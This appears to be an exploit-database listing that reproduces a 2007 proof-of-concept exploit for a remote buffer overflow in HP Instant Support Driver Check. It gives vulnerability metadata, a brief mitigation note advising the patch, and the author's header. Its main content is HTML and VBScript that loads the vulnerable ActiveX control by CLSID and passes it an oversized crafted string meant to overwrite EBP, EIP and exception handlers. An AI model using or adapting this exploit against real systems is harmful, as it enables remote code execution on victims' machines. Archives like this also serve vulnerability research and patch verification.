header-logo
Suggest Exploit
vendor:
HP Instant Support - Driver Check
by:
Carlo Di Dato (aka shinnai)
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: HP Instant Support - Driver Check
Affected Version From:
Affected Version To:
Patch Exists: YES
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP Professional SP2
2007

HP Instant Support – Driver Check Remote Buffer Overflow Exploit

This exploit takes advantage of a buffer overflow vulnerability in HP Instant Support - Driver Check. By sending a specially crafted HTML code, an attacker can cause a remote buffer overflow and potentially execute arbitrary code on the target system.

Mitigation:

HP has released a security bulletin addressing this vulnerability. It is recommended to apply the provided patch or update to a version that is not affected by this issue.
Source

Exploit-DB raw data:

----------------------------------------------------------------------------------
 HP Instant Support - Driver Check Remote Buffer Overflow Exploit

 author: Carlo Di Dato (aka shinnai)
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org
 Tested on Windows XP Professional SP2 full patched with IE7

 Special thanks to:
 rgod for his support and friendship
 John Morris from HP Software Security for his honesty
 str0ke... for being str0ke :)

 HP Security Bulletin:
 http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01077597
----------------------------------------------------------------------------------

 <html>
 <object classid='clsid:156BF4B7-AE3A-4365-BD88-95A75AF8F09D' id='test'></object>
  <script language = 'vbscript'>
   
   buff             = String(222, "A")

   get_EBP          = "cccc"

   get_EIP          = unescape("aaaa")

   buf1             = unescape("bbbb")

   second_exception = unescape("%00%00%92%00")

   first_exception  = unescape("%00%00%92%00")

   buf2             = String(4000, "B")

   egg              = buff + get_EBP + get_EIP + buf1 + second_exception + first_exception + buf2

   test.queryHub egg
 
 </script>
</html>

# milw0rm.com [2007-07-02]

Navigation

Suggest Exploit

Services By CQR